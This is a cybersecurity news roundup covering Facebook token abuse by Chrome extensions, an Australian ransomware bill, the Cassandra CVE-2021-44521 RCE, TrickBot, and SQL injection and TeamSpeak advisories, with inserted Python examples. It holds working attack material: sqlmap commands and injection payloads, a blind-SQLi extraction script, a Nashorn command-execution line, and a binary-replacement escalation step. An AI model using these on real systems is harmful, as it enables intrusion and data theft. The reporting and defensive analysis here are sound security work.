Sunday, January 19, 2025

Facebook is one Chrome Extension away from another Privacy Scandal


Multiple Chrome browser extensions make use of a session token for Meta’s Facebook that grants access to signed-in users’ social network data in a way that violates the company’s policies and leaves users open to potential privacy violations.

Security researcher Zach Edwards last week noted that Brave had blocked a Chrome extension called L.O.C. out of concern it exposed the user’s Facebook data to a third-party server without any notice or permission prompt.

L.O.C. utilized an access token that can be easily obtained from Facebook’s Creator Studio web app. After extracting this token – a text string composed of 192 letters and numbers – from the app, the browser extension is able to use it with Facebook’s Graph API without being an approved third-party Facebook app to fetch data about the signed-in user.

It does so, its developer says, to allow users to automate the processing of their Facebook data.

The problem is that data access of this sort could be abused, as it has been in the past. An extension utilizing this token could, for example, copy the user’s data and send it to a remote server without the user’s knowledge or consent. Or it could store the user’s name and email and use that for tracking the individual across websites.

Here’s how a theoretical data theft could easily occur:

  1. You create and release a seemingly innocent Chrome extension that can fetch access tokens from Facebook’s Creator Studio.
  2. Whenever a victim installs your Chrome extension and is signed into Facebook, the extension obtains one of these tokens on the victim’s behalf to silently access their Facebook data via the social network’s Graph API.
  3. The extension then exfiltrates the victim’s data to a remote server.

The ability to grab an access token from the Creator Studio provides a route for extensions to quietly, automatically harvest signed-in users’ profile data without permission and without having to, say, scrape pages.

The access token is obtained by fetching the Creator Studio page and extracting the accessToken value from its source.
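As an added example (not code from The Register, Brave, or any of the extensions named here), the following Python audits Chrome extension manifests for the one capability the procedure above depends on: host access to facebook.com, which is what lets an extension fetch the Creator Studio page with the user's cookies and lift the token out of its source. The sample manifests are constructed, the "Hypothetical" names are not real extensions, and the Facebook host list is an assumption, since the page does not name the exact Creator Studio URL.

```python
"""Audit Chrome extension manifests for host access to facebook.com.
Added example; manifests below are constructed, not any real extension's."""
import json
from pathlib import Path

# Assumption: Creator Studio is served from these hosts (exact URL not on the page).
FACEBOOK_HOSTS = ("www.facebook.com", "business.facebook.com")


def pattern_covers(pattern: str, host: str) -> bool:
    """Does a Chrome match pattern (e.g. '*://*.facebook.com/*') cover host?"""
    if pattern == "<all_urls>":
        return True
    rest = pattern.split("://", 1)[1] if "://" in pattern else pattern
    host_part = rest.split("/", 1)[0]
    if host_part == "*":
        return True
    if host_part.startswith("*."):
        base = host_part[2:]
        return host == base or host.endswith("." + base)
    return host_part == host


def host_patterns(manifest: dict) -> list:
    """Every match pattern that grants page/cookie access, for MV2 and MV3 manifests."""
    patterns = list(manifest.get("host_permissions", []))            # MV3
    patterns += [p for p in manifest.get("permissions", [])
                 if "://" in p or p == "<all_urls>"]                  # MV2
    for script in manifest.get("content_scripts", []):
        patterns += script.get("matches", [])
    return patterns


def audit_manifest(manifest: dict) -> dict:
    """Report whether a manifest can read Facebook pages as the signed-in user."""
    patterns = host_patterns(manifest)
    fb = sorted({p for p in patterns
                 if any(pattern_covers(p, h) for h in FACEBOOK_HOSTS)})
    return {
        "name": manifest.get("name", "?"),
        "facebook_patterns": fb,
        "reads_facebook": bool(fb),
        # '<all_urls>' or '*://*/*' style grants: every site, not just Facebook
        "all_hosts": any(p == "<all_urls>" or p.split("://", 1)[-1].startswith("*/")
                         for p in patterns),
    }


def audit_profile(profile_dir: str) -> list:
    """Audit every installed extension of a Chrome profile on disk.
    Chrome stores them as <profile>/Extensions/<id>/<version>/manifest.json."""
    return [audit_manifest(json.loads(mf.read_text(encoding="utf-8")))
            for mf in Path(profile_dir).glob("Extensions/*/*/manifest.json")]


# Constructed manifests (the page does not show the real L.O.C. manifest).
TOKEN_READER = {"name": "Hypothetical FB automation helper", "manifest_version": 3,
                "host_permissions": ["*://*.facebook.com/*"]}
BROAD = {"name": "Hypothetical page tweaker", "manifest_version": 2,
         "permissions": ["tabs", "<all_urls>"]}
BENIGN = {"name": "Hypothetical weather widget", "manifest_version": 3,
          "host_permissions": ["https://api.example.com/*"]}

if __name__ == "__main__":
    for m in (TOKEN_READER, BROAD, BENIGN):
        print(audit_manifest(m))
```

Only the Facebook side is worth gating on: a cookie-bearing fetch of facebook.com from an extension needs a host permission that covers it, whereas sending the result outward does not, because an attacker-controlled server can simply allow cross-origin requests. So an extension whose only declared hosts are Facebook's still has everything it needs for the three steps above.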

In September 2018, Facebook acknowledged a security issue affecting almost 50 million accounts, which it attributed to miscreants stealing access tokens presented by its “View As” feature to allow people to see how their profiles look to others.

“This allowed them to steal Facebook access tokens which they could then use to take over people’s accounts,” explained Guy Rosen, who was VP of Product Management at the time and is now VP of Integrity at Meta. “Access tokens are the equivalent of digital keys that keep people logged in to Facebook so they don’t need to re-enter their password every time they use the app.”

The access token available through Creator Studio does not pose the same threat of account takeover as the “View As” token.

A Meta spokesperson told us via email that these sorts of tokens have legitimate uses and provide no access to data beyond what’s available to an individual account holder. And Meta said there’s no indication that the L.O.C. extension has been exfiltrating information from people’s devices. Nonetheless, the token does provide programmatic access to data about signed-in Facebook users without authorization or consent.

It was this risk that prompted browser maker Brave to block the L.O.C. extension, until developer Loc Mai contacted Brave’s development team. A Brave spokesperson said the company is working with the programmer to make some changes – likely a notification or permission prompt – so the extension is acceptable from a privacy and security standpoint.

And it’s a risk that ought to concern Meta and its subsidiaries given Facebook’s 2019 settlement of an FTC investigation that followed from the Cambridge Analytica scandal. As part of that deal, Facebook committed to limiting third-party access to user data.

Cambridge Analytica obtained people’s Facebook profile information via a third-party quiz app that plugged into the social network. There are parallels here: you hope that a quiz app won’t share your Facebook profile info with others, and you hope a Chrome extension avoids that, too.

Though Facebook vowed to put in place measures to prevent another Cambridge Analytica fiasco, the Creator Studio access token in the hands of a malicious and widely installed Chrome extension could lead to a repeat of history.

“Under the new framework required by the FTC, we’ll be accountable and transparent about fixing old products that don’t work the way they should and building new products to a higher standard,” Facebook insisted when it promised to clean up data access nearly three years ago.

We’re dealing with it, sort of

In an email to The Register, a Meta spokesperson said the company is dealing with these extensions but that requires the help of Google.

“The access tokens that these extensions request help creators and others to use our tools and products but aren’t capable of accessing data beyond what people can do with their own account or what the session cookie on their browser already provides,” Meta’s spokesperson said in an email.

“Since installing browser extensions can carry risk, we regularly report ones that violate our policies to browser makers like Google to have them removed, as we did in this case. This work is managed by our dedicated External Data Misuse team that focuses on detecting, blocking, and deterring improper automated use of our services.”

Part of the issue is that Google’s Chrome extensions are easy to subvert or misuse and Meta doesn’t have a direct way to prevent the publication of extensions that abuse its Graph API, apart from reporting the issue to Google.

Meta’s spokesperson said that the Creator Studio token is scoped to the user’s session, which means it will expire if the extension user logs out of Facebook. And if the token has not been transmitted to the extension developer’s server, as appears to be the case with the L.O.C. extension, then uninstalling the extension will also cause the token to expire.

The token, we’re told, is not the problem; rather, it is that browser extensions allow users to automate Facebook activities. Meta’s spokesperson advised people to be cautious when installing extensions and said browser makers like Google need to be vigilant and remove unsafe extensions from their web stores.

Edwards told The Register that this is a weird problem because if someone can be convinced to install one of these extensions, that trust could be easily abused. Facebook, he said, isn’t providing any notice to users based on the data permissions they’ve granted, which differs from the notice and authorization prompts that follow from permitted programmatic interaction with the social network.

So far, no action has been taken, and according to Edwards, there are several Chrome extensions at least that similarly co-opt the Creator Studio access token to allow data to be fetched via the Facebook Graph API.

J2TEAM Security (200K users), MonokaiToolkit (10K users), FBVN (80,000 users), and KB2A Tool (50,000 users) all utilize this token, according to Edwards. He explained these all appear to have come out of a Facebook group frequented by Vietnamese-speaking developers who hunt Facebook tokens, ostensibly to provide services the social network doesn’t offer.

The Register has no reason to believe these developers are misusing user data. In fact, J2TEAM Security purports to block Facebook phishing URLs. It is entirely possible to use Facebook’s access token to promote security rather than harm it.

But the fact that this group of developers can access Facebook users’ data through the Graph API in ways that violate Facebook rules – and has been doing so at least since 2017 – shows there is a gap between having rules and enforcing them.

Meta insists it is dealing with these extensions and pointed to its External Data Misuse efforts. The internet giant’s spokesperson reiterated that the company regularly takes action to enforce its policies and noted that Facebook previously sent a cease and desist letter to the developer of the L.O.C. extension and banned him from the platform – though that’s done nothing to disable the extension.

We’re told Meta has made another request to Google to remove the extension from its Chrome Web Store and is looking at the other extensions mentioned above.

Even so, abuse of these sorts of tokens looks likely to continue because Meta says they have legitimate use cases, like enabling access to its Creator Studio app and supporting functionality like Recent Posts in the Creator Home tab.

You may also enjoy reading, CVEs You May Have Missed While Log4J Stole The Headlines

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.

AU: Hackers face 25 years’ jail for ransomware attacks on critical infrastructure


Cryptocurrency seizure in the bill, plus other new offences.

Hackers will face up to 25 years’ jail for deliberately targeting critical infrastructure assets under proposed changes to Australia’s computer offences designed to stem the rise in ransomware attacks against businesses.

The new laws will also give federal police “clear legal authority” to investigate and prosecute gangs operating offshore, and the ability to seize cryptocurrencies and other digital assets during the course of an investigation.

The proposed amendments are contained in the Crimes Legislation Amendment (Ransomware Action Plan) Bill 2022, introduced to parliament on Thursday morning by Tim Wilson, assistant minister to the minister for industry, energy and emissions reduction.

The bill delivers the federal government’s ransomware action plan, which proposed a suite of new offences for stealing data and the buying and selling of malware, to better protect businesses from attacks.

The action plan, released in October 2021, also foreshadows a mandatory ransomware incident reporting regime that will apply to businesses with a turnover of $10 million or more each year, though that proposal does not form part of the bill.

It follows attempts by the federal opposition to create a similar reporting scheme as part of a private members bill introduced by shadow assistant minister for cyber security Tim Watts in June 2021.

Introducing the bill on behalf of home affairs minister Karen Andrews, Wilson said the amendments are a “critical step to deter ransomware gangs, enable a more effective law enforcement response and halt the flow of cryptocurrencies”.

“This bill modernises Australia’s computer offences to ensure ransomware gangs face criminal liability for each aspect of their business model and increases penalties for their egregious conduct,” he said.

If passed, the bill will allow law enforcement agencies to “investigate and prosecute [computer] offences under the… Criminal Code where the conduct occurs outside of Australia but impacts persons in Australia”.

Wilson said the new power would “provide the Australian Government clear legal authority to investigate and prosecute criminals targeting Australians and Australian businesses regardless of their location”.

The bill creates several new offences targeting cyber criminals, including an “aggravated offence” for any person who commits a computer offence against critical infrastructure, which is intended to work hand-in-hand with reforms to critical infrastructure security.

Actions intended to “cause an impact, whether direct or indirect, on the availability, integrity or reliability of a critical infrastructure asset or on the confidentiality of information about or stored in, or confidentiality of the critical infrastructure asset” will be considered an offence.

The offence carries a maximum penalty of 25 years in prison, which the explanatory memorandum states “appropriately reflects the catastrophic risk posed by cyber attacks that utilise ransomware or malware to cause harm to critical infrastructure”.

A new aggravated offence is also created for buyers and sellers of ransomware, which is intended to target the ransomware business model, particularly “ransomware-as-a-service” or any commissions paid by threat actors.

The bill also introduces a new offence that “criminalises all forms of extortion in relation to a victim of a computer offence”, regardless of “whether or not the person has caused the unauthorised access, modification or impairment of data”.

“This ensures that groups of individuals or criminal syndicates face criminal liability where individuals comprising the group perform specific roles,” the explanatory memorandum states, adding that the offence carries a maximum penalty of 10 years’ prison.

Other changes include increases to the maximum penalty for unauthorised access to, or modification of, restricted data and unauthorised impairment of data held on a computer disk from two years to five years – the first time this has been amended since 2001.

In addition to the new offences, the bill “extends current investigative and freezing powers that cover financial institutions to certain digital currency exchanges” and establishes a legal basis for police to seize cryptocurrency and other digital assets under a warrant.

Wilson said this change “reflects the way criminals are using cryptocurrency as part of their criminal activities” and would allow law enforcement to continue to “effectively detect, disrupt and deter activities harmful to Australians”.

Debate on the bill was adjourned to a later date.


Experts disclose details of Apache Cassandra RCE


Researchers disclose a now-patched remote code execution (RCE) vulnerability in the Apache Cassandra database software.

JFrog researchers publicly disclosed details of a now-patched high-severity security vulnerability (CVE-2021-44521) in Apache Cassandra database software that could be exploited by remote attackers to achieve code execution on affected installations.

Apache Cassandra is an open-source NoSQL distributed database used by thousands of companies.

“JFrog’s Security Research team recently disclosed an RCE (remote code execution) issue in Apache Cassandra, which has been assigned to CVE-2021-44521 (CVSS 8.4).” reads the analysis published by JFrog. “This Apache security vulnerability is easy to exploit and has the potential to wreak havoc on systems, but luckily only manifests in non-default configurations of Cassandra.”

Cassandra offers user-defined functions (UDFs), which allow custom processing of data inside the database.

Admins can write UDFs in Java or JavaScript. For JavaScript, Cassandra uses the Nashorn engine in the Java Runtime Environment (JRE), which is not guaranteed to be secure when accepting untrusted code.

JFrog researchers discovered that when user-defined functions (UDFs) are enabled, threat actors could leverage the Nashorn engine to escape the sandbox and achieve remote code execution.

“For example, running the following Nashorn JavaScript code allows execution of an arbitrary shell command –

java.lang.Runtime.getRuntime().exec("touch hacked")

Cassandra’s development team decided to implement a custom sandbox around the UDF execution which uses two mechanisms to restrict the UDF code” states the report.

Experts noticed that the exploitation is possible when the cassandra.yaml configuration file contains the following definitions:

  • enable_user_defined_functions: true
  • enable_scripted_user_defined_functions: true
  • enable_user_defined_functions_threads: false

“When the option is set to false, all invoked UDF functions run in the Cassandra daemon thread, which has a security manager with some permissions. We will show how to abuse these permissions to achieve sandbox escape and RCE.” continues the analysis.

Experts shared a PoC that creates a new file named “hacked” on the Cassandra server.

Apache released versions 3.0.26, 3.11.12, and 4.0.2 to address the vulnerability. They add a new flag, “allow_extra_insecure_udfs”, set to false by default, which prevents turning off the security manager and blocks access to java.lang.System.


TrickBot developers continue to refine the malware’s sneakiness and power


The versatile malware known as TrickBot continues to pose “great danger” to customers of financial and technology companies because its developers are trying to stay a step ahead of cybersecurity analysts, according to Check Point Research.

The company says TrickBot’s authors have equipped it with layers of “anti-analysis” and “anti-deobfuscation” capabilities, meaning that if an expert tries to pick apart the malware’s code, it stops communicating with its command-and-control servers or stops working altogether. Those features “show the authors’ highly technical background and explain why Trickbot remains a very prevalent malware family,” Check Point says in research published Wednesday.

The danger remains clear, too: Check Point says the various modules of TrickBot are often deployed for stealing login credentials from customers of several large banks, including Bank of America and Wells Fargo, as well as big tech firms like Microsoft and Amazon. About 60 companies are affected overall. “These brands are not the victims but their customers might be the targets,” Check Point says.

One of TrickBot’s strengths is its ability to perpetuate itself — a feature that established its early reputation as botnet software. Check Point’s latest research shows how the malware’s developers have branched out, and with purpose. TrickBot has been linked to Russian origins, but Check Point doesn’t speculate on where the code might be coming from now.

The developers “have the skills to approach malware development from a very low-level and pay attention to small details. … At the same time, we know that the operators behind the infrastructure are very experienced with malware development on a high-level as well,” says Alexander Chailytko, the cybersecurity, research and innovation manager at Check Point. “The combination of these two factors is what allows Trickbot to remain a dangerous threat for more than 5 years already.”

Israel-based Check Point noted in December 2021 that TrickBot had bounced back despite operations by Microsoft and U.S. Cyber Command that stunted it before the 2020 U.S. elections. Not only had the company identified at least 140,000 new victims, as of late last year, but the malware also was helping to revive the Emotet botnet.

Since the 2020 takedown, TrickBot’s developers have updated a “web injection” module that captures emails and passwords from unsuspecting website users, Check Point says. The report also identifies code that captures and spreads credentials in part by using techniques with names familiar to cybersecurity researchers: Mimikatz and EternalRomance. Another module steals credentials from applications like popular web browsers, email programs, FTP clients and VPN providers, Check Point says.

TrickBot has more than 20 modules overall, and they “allow the execution of all kinds of malicious activities” while posing “great danger” to the data and potentially the bank accounts of victims, Check Point says.

One of Trickbot’s alleged developers, Vladimir Dunaev, was extradited to the U.S. last year on charges of computer fraud, bank fraud, wire fraud, money laundering and identity theft.


Multi-Vendor Online Groceries Management System 1.0 – ‘id’ Blind SQL Injection

# Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: XAMPP, Windows 10


# Vulnerable Code

line 2 in file "mvogms/products/view_product.php"

$qry = $conn->query("SELECT  p.*, v.shop_name as vendor, c.name as `category` FROM `product_list` p inner join vendor_list v on p.vendor_id = v.id inner join category_list c on p.category_id = c.id where p.delete_flag = 0 and p.id = '{$_GET['id']}'");

# Sqlmap command:

sqlmap -u 'localhost/mvogms/?page=products/view_product&id=3' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch

# Output:

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=products/view_product&id=3' AND 9973=9973-- ogag

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=products/view_product&id=3' AND (SELECT 2002 FROM (SELECT(SLEEP(5)))anjK)-- glsQ
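The following Python is an added example, not code from the advisory or from the Multi-Vendor Online Groceries Management System. It rebuilds the shape of the vulnerable view_product.php query over a constructed SQLite database (SQLite stands in for the MySQL the target uses), shows the parameterised form beside it, and then drives the same true/false oracle that sqlmap's boolean-based blind payload relies on to recover a string one character at a time, which is what sqlmap's dump stage does after confirming the injection. The schema, rows and the FreshMart vendor name are constructed.

```python
"""Boolean-based blind SQL injection against a view_product.php-style query.
Added example; SQLite stands in for MySQL, schema and rows are constructed."""
import sqlite3


def build_db() -> sqlite3.Connection:
    # Constructed subset of the application's tables.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE vendor_list(id INTEGER, shop_name TEXT);
        CREATE TABLE product_list(id INTEGER, name TEXT, vendor_id INTEGER, delete_flag INTEGER);
        INSERT INTO vendor_list VALUES (1, 'FreshMart');
        INSERT INTO product_list VALUES (3, 'Bananas', 1, 0);
    """)
    return conn


def view_product_vulnerable(conn, id_param: str) -> list:
    """Mirrors the PHP: the id parameter is spliced straight into the SQL text."""
    sql = ("SELECT p.*, v.shop_name AS vendor FROM product_list p "
           "JOIN vendor_list v ON p.vendor_id = v.id "
           f"WHERE p.delete_flag = 0 AND p.id = '{id_param}'")
    return conn.execute(sql).fetchall()


def view_product_fixed(conn, id_param: str) -> list:
    """Same query with a bound parameter: the input is a value, never SQL."""
    sql = ("SELECT p.*, v.shop_name AS vendor FROM product_list p "
           "JOIN vendor_list v ON p.vendor_id = v.id "
           "WHERE p.delete_flag = 0 AND p.id = ?")
    return conn.execute(sql, (id_param,)).fetchall()


def oracle(conn, condition: str) -> bool:
    """The blind oracle: does the page still show a product for
    id=3' AND <condition>-- x ?  (sqlmap's '-- ogag' suffix is the same trick.)"""
    return bool(view_product_vulnerable(conn, f"3' AND {condition}-- x"))


def blind_extract(conn, subquery: str, max_len: int = 32) -> str:
    """Recover the first row of subquery one character at a time via the oracle."""
    out = ""
    for pos in range(1, max_len + 1):
        found = None
        for code in range(32, 127):                      # printable ASCII
            cond = f"unicode(substr(({subquery}),{pos},1))={code}"
            if oracle(conn, cond):
                found = chr(code)
                break
        if found is None:                                # ran past the end of the string
            break
        out += found
    return out


if __name__ == "__main__":
    db = build_db()
    print(view_product_vulnerable(db, "3' AND 9973=9973-- x"))   # one row: condition true
    print(view_product_vulnerable(db, "3' AND 9973=9974-- x"))   # no rows: condition false
    print(view_product_fixed(db, "3' AND 9973=9973-- x"))        # no rows: treated as a literal id
    print(blind_extract(db, "SELECT shop_name FROM vendor_list LIMIT 1"))
```

MySQL only treats `--` as a comment when it is followed by whitespace, which is why sqlmap appends a space and junk after it; SQLite does not need the space, but the payload shape is identical. The time-based variant in the sqlmap output uses MySQL's SLEEP(), which SQLite lacks, so it is not reproduced here. The fix is the bound parameter, with an integer cast of `id` as a second line of defence.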
            

TeamSpeak 3.5.6 Vuln – Insecure File Permissions

# Exploit Title: TeamSpeak 3.5.6 - Insecure File Permissions

# Exploit Author: Aryan Chehreghani
# Contact: aryanchehreghani@yahoo[.]com
# Vendor Homepage: https://www[.]teamspeak.com
# Software Link: https://www[.]teamspeak.com/en/downloads
# Version: 3.5.6 
# Tested on: Windows 10 x64

# [ About - TeamSpeak ]:
#TeamSpeak (TS) is a proprietary voice-over-Internet Protocol (VoIP)
#application for audio communication between users on a chat channel,
#much like a telephone conference call. Users typically use headphones with a microphone.
#The client software connects to a TeamSpeak server of the user's choice, from which the user may join chat channels.
#The target audience for TeamSpeak is gamers, who can use the software to communicate
#with other players on the same team of a multiplayer video game.
#Communicating by voice gives a competitive advantage by enabling players to keep their hands on the controls.

# [ Description ]:
#The TeamSpeak Application was installed with insecure file permissions.
#It was found that all folder and file permissions were incorrectly configured during installation.
#It was possible to replace the service binary. 

# [ POC ]:

C:\Users\user\AppData\Local\TeamSpeak 3 Client>icacls *.exe

createfileassoc.exe NT AUTHORITY\SYSTEM:(F)
                    BUILTIN\Administrators:(F)
                    WIN-FREMP1UB3LB\Administrator:(F)

error_report.exe NT AUTHORITY\SYSTEM:(F)
                 BUILTIN\Administrators:(F)
                 WIN-FREMP1UB3LB\Administrator:(F)

package_inst.exe NT AUTHORITY\SYSTEM:(F)
                 BUILTIN\Administrators:(F)
                 WIN-FREMP1UB3LB\Administrator:(F)

QtWebEngineProcess.exe NT AUTHORITY\SYSTEM:(F)
                       BUILTIN\Administrators:(F)
                       WIN-FREMP1UB3LB\Administrator:(F)

ts3client_win32.exe NT AUTHORITY\SYSTEM:(F)
                    BUILTIN\Administrators:(F)
                    WIN-FREMP1UB3LB\Administrator:(F)

Uninstall.exe NT AUTHORITY\SYSTEM:(F)
              BUILTIN\Administrators:(F)
              WIN-FREMP1UB3LB\Administrator:(F)

update.exe NT AUTHORITY\SYSTEM:(F)
           BUILTIN\Administrators:(F)
           WIN-FREMP1UB3LB\Administrator:(F)

Successfully processed 7 files; Failed processing 0 files

# [ Exploit - Privilege Escalation ]:
#Replace ts3client_win32.exe, update.exe, package_inst.exe, QtWebEngineProcess.exe, createfileassoc.exe or any of the other binaries
#with a malicious executable of your choice, then wait for it to be run and obtain SYSTEM or Administrator rights (Privilege Escalation).
#Note that the icacls listing above shows only SYSTEM, Administrators and the local Administrator account with (F); it does not show a
#standard-user principal with write access, and the install lives under the user's own %LOCALAPPDATA%. Before relying on this for
#escalation, check the directory ACL as well (icacls on the folder) and confirm that a higher-privileged process, such as an updater
#or service, actually executes the replaced binary.
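The Python below is an added example, not part of the advisory or of TeamSpeak. It parses icacls output of the form shown above and reports only the ACEs that matter for a file-replacement escalation: a principal that is not already privileged holding a right that lets it modify the file. Run over the advisory's own listing (abridged to two of the seven files) it finds nothing, which is the check a reviewer would want before accepting the claim; the second listing is constructed to show what a real finding looks like. File names without spaces are assumed, as in the listing.

```python
"""Flag icacls ACEs that let a low-privilege account replace a binary.
Added example; the WEAK_LISTING sample is constructed."""
import re

# Principals that already run with high privilege; their (F) is expected, not a finding.
PRIVILEGED = {"nt authority\\system", "builtin\\administrators",
              "nt service\\trustedinstaller", "creator owner"}
# icacls simple and specific rights that allow changing the file or its ACL.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WA", "WEA", "DE", "DC", "WDAC", "WO"}

ACE_RE = re.compile(r"^(?P<principal>[^:]+?):(?P<rights>(?:\([^)]*\))+)$")


def parse_icacls(text: str) -> dict:
    """Return {filename: [(principal, {rights...}), ...]} from icacls output.
    Assumes file names contain no spaces (true for the advisory's listing)."""
    entries, current = {}, None
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line.strip() or line.startswith("Successfully processed"):
            continue
        if raw[:1].isspace():                     # indented: another ACE for the same file
            ace = line.strip()
        else:                                     # "<name> <principal>:(rights)"
            current, _, ace = line.partition(" ")
            ace = ace.strip()
            entries.setdefault(current, [])
        m = ACE_RE.match(ace)
        if not m or current is None:
            continue
        # "(OI)(CI)(M)" -> {OI, CI, M}; "(R,W)" style groups are split on commas
        rights = {r for g in re.findall(r"\(([^)]*)\)", m.group("rights")) for r in g.split(",")}
        entries[current].append((m.group("principal").strip(), rights))
    return entries


def is_privileged(principal: str) -> bool:
    p = principal.lower()
    return p in PRIVILEGED or p.endswith("\\administrator")


def writable_by_low_priv(entries: dict) -> dict:
    """Files a non-privileged principal can modify, with the offending ACEs."""
    findings = {}
    for name, aces in entries.items():
        bad = [(p, sorted(r)) for p, r in aces if not is_privileged(p) and r & WRITE_RIGHTS]
        if bad:
            findings[name] = bad
    return findings


# The advisory's listing, abridged to two files: only SYSTEM and administrators hold (F).
ADVISORY_LISTING = """\
ts3client_win32.exe NT AUTHORITY\\SYSTEM:(F)
                    BUILTIN\\Administrators:(F)
                    WIN-FREMP1UB3LB\\Administrator:(F)

update.exe NT AUTHORITY\\SYSTEM:(F)
           BUILTIN\\Administrators:(F)
           WIN-FREMP1UB3LB\\Administrator:(F)

Successfully processed 2 files; Failed processing 0 files
"""

# Constructed listing: Users can modify svc.exe, which is a genuine finding.
WEAK_LISTING = """\
svc.exe NT AUTHORITY\\SYSTEM:(F)
        BUILTIN\\Users:(OI)(CI)(M)
        Everyone:(RX)
"""

if __name__ == "__main__":
    print(writable_by_low_priv(parse_icacls(ADVISORY_LISTING)))   # {}
    print(writable_by_low_priv(parse_icacls(WEAK_LISTING)))       # {'svc.exe': [...]}
```

An empty result on the advisory's listing does not by itself disprove the issue, since the directory ACL and the owner of a per-user install are not in the output; it does mean the listing as shown is not evidence of it. Running `icacls` on the folder and checking which privileged process executes the binaries is the rest of the check.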

High-Severity RCE Security Bug Reported in Apache Cassandra Database Software


Researchers have revealed details of a now-patched high-severity security vulnerability in Apache Cassandra that, if left unaddressed, could be abused to gain remote code execution (RCE) on affected installations.

“This Apache security vulnerability is easy to exploit and has the potential to wreak havoc on systems, but luckily only manifests in non-default configurations of Cassandra,” Omer Kaspi, security researcher at DevOps firm JFrog, said in a technical write-up published Tuesday.


Apache Cassandra is an open-source, distributed, NoSQL database management system for managing very large amounts of structured data across commodity servers.

Tracked as CVE-2021-44521 (CVSS score: 8.4), the vulnerability concerns a specific scenario where the configuration for user-defined functions (UDFs) are enabled, effectively allowing an attacker to leverage the Nashorn JavaScript engine, escape the sandbox, and achieve execution of untrusted code.

Specifically, it was found that Cassandra deployments are vulnerable to CVE-2021-44521 when the cassandra.yaml configuration file contains the following definitions:

  • enable_user_defined_functions: true
  • enable_scripted_user_defined_functions: true
  • enable_user_defined_functions_threads: false

“When the [enable_user_defined_functions_threads] option is set to false, all invoked UDF functions run in the Cassandra daemon thread, which has a security manager with some permissions,” Kaspi said, thereby allowing the adversary to disable the security manager and break out of the sandbox and run arbitrary shell commands on the server.

Apache Cassandra users are encouraged to upgrade to versions 3.0.26, 3.11.12, or 4.0.2 to avoid possible exploitation. The fix adds a new flag, “allow_extra_insecure_udfs”, that’s set to false by default and prevents turning off the security manager.
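Both Cassandra items above give the same three cassandra.yaml settings and the same three fixed releases. The Python below is an added example, not code from JFrog or the Apache Cassandra project, that turns them into a check: it reads the relevant booleans out of a cassandra.yaml fragment (without needing PyYAML), compares the running version against the first fixed release on its branch, and reports whether the CVE-2021-44521 precondition holds. The two config fragments are constructed, one with the vulnerable trio and one hardened, and the shipping defaults for the four options are stated in the code.

```python
"""Check cassandra.yaml plus a Cassandra version for the CVE-2021-44521 precondition.
Added example; config fragments are constructed."""
import re

# Shipping defaults for the options that matter here.
DEFAULTS = {
    "enable_user_defined_functions": False,
    "enable_scripted_user_defined_functions": False,
    "enable_user_defined_functions_threads": True,
    "allow_extra_insecure_udfs": False,      # introduced by the fix; false by default
}
# First fixed release on each branch: 3.0.26, 3.11.12, 4.0.2.
FIXED = {(3, 0): (3, 0, 26), (3, 11): (3, 11, 12), (4, 0): (4, 0, 2)}


def parse_flags(yaml_text: str) -> dict:
    """Pull the top-level boolean keys out of cassandra.yaml; unset keys keep defaults."""
    flags = dict(DEFAULTS)
    for line in yaml_text.splitlines():
        m = re.match(r"^([A-Za-z_]+)\s*:\s*(true|false)\s*(#.*)?$", line, re.I)
        if m and m.group(1) in flags:
            flags[m.group(1)] = m.group(2).lower() == "true"
    return flags


def is_patched(version: str) -> bool:
    """Dotted-number compare, e.g. '3.11.11'. Branches with no listed fix
    (2.x, 3.1-3.10, 4.1+) are judged against 4.0.2: older is unpatched."""
    v = tuple(int(x) for x in version.split(".")[:3])
    return v >= FIXED.get(v[:2], (4, 0, 2))


def assess(yaml_text: str, version: str) -> dict:
    f = parse_flags(yaml_text)
    # Scripted UDFs running in the daemon thread: the page's three-line precondition.
    risky = (f["enable_user_defined_functions"]
             and f["enable_scripted_user_defined_functions"]
             and not f["enable_user_defined_functions_threads"])
    patched = is_patched(version)
    # After the fix, the same trio only matters if the operator also opts in.
    exploitable = risky and (not patched or f["allow_extra_insecure_udfs"])
    return {"risky_config": risky, "patched": patched, "exploitable": exploitable}


# Constructed fragment with the vulnerable combination.
VULNERABLE_YAML = """\
cluster_name: 'Test Cluster'
enable_user_defined_functions: true
enable_scripted_user_defined_functions: true
enable_user_defined_functions_threads: false
"""

# Constructed hardened fragment: Java UDFs stay on, scripted UDFs are off, each UDF
# runs in its own sandboxed thread, and allow_extra_insecure_udfs keeps its default.
HARDENED_YAML = """\
cluster_name: 'Test Cluster'
enable_user_defined_functions: true
enable_scripted_user_defined_functions: false
enable_user_defined_functions_threads: true
"""

if __name__ == "__main__":
    print(assess(VULNERABLE_YAML, "4.0.1"))   # exploitable
    print(assess(VULNERABLE_YAML, "4.0.2"))   # risky config, but patched
    print(assess(HARDENED_YAML, "3.11.11"))   # not exploitable even unpatched
```

Upgrading removes the exposure for the default value of the new flag; the hardened fragment shows what to set if an upgrade has to wait, since the issue needs scripted UDFs in the daemon thread, not UDFs as such.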


Why Web3 isn’t the privacy panacea we think it is

  • Running on blockchain, Web3 is expected to revolutionize the internet by changing the ownership and power of private data to the users.
  • Some experts reckon due to its lack of central control and access to data, Web3 could make it even more difficult to police cybercrime.

